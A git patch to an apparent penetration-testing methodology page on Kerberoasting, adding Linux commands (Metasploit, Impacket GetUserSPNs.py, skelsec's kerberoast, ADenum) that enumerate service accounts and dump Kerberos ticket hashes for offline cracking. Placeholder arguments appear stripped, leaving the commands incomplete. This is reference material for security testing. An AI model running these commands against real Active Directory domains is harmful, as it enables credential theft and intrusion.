From edc2fbae0f9f2fc52bbdebeed4640ebe5f73ab70 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 4 Jul 2023 11:40:16 +0200 Subject: [PATCH] kerberoast: add some linux tools --- .../active-directory-methodology/kerberoast.md | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md index 9a08caa34..be93961b8 100644 --- a/windows-hardening/active-directory-methodology/kerberoast.md +++ b/windows-hardening/active-directory-methodology/kerberoast.md @@ -39,9 +39,21 @@ RC4 (type 23) hashes begin with **`$krb5tgs$23$*`** while AES-256(type 18) start #### **Linux** ```bash +# Metasploit framework msf> use auxiliary/gather/get_user_spns -GetUserSPNs.py -request -dc-ip 192.168.2.160 / -outputfile hashes.kerberoast # Password will be prompted -GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes : / -outputfile hashes.kerberoast +# Impacket +GetUserSPNs.py -request -dc-ip / -outputfile hashes.kerberoast # Password will be prompted +GetUserSPNs.py -request -dc-ip -hashes : / -outputfile hashes.kerberoast +# kerberoast: https://github.com/skelsec/kerberoast +kerberoast ldap spn 'ldap+ntlm-password://\:@' -o kerberoastable # 1. Enumerate kerberoastable users +kerberoast spnroast 'kerberos+password://\:@' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes +``` + +Multi-features tools including a dump of kerberoastable users: + +```bash +# ADenum: https://github.com/SecuProject/ADenum +adenum -d -ip -u -p -c ``` #### Windows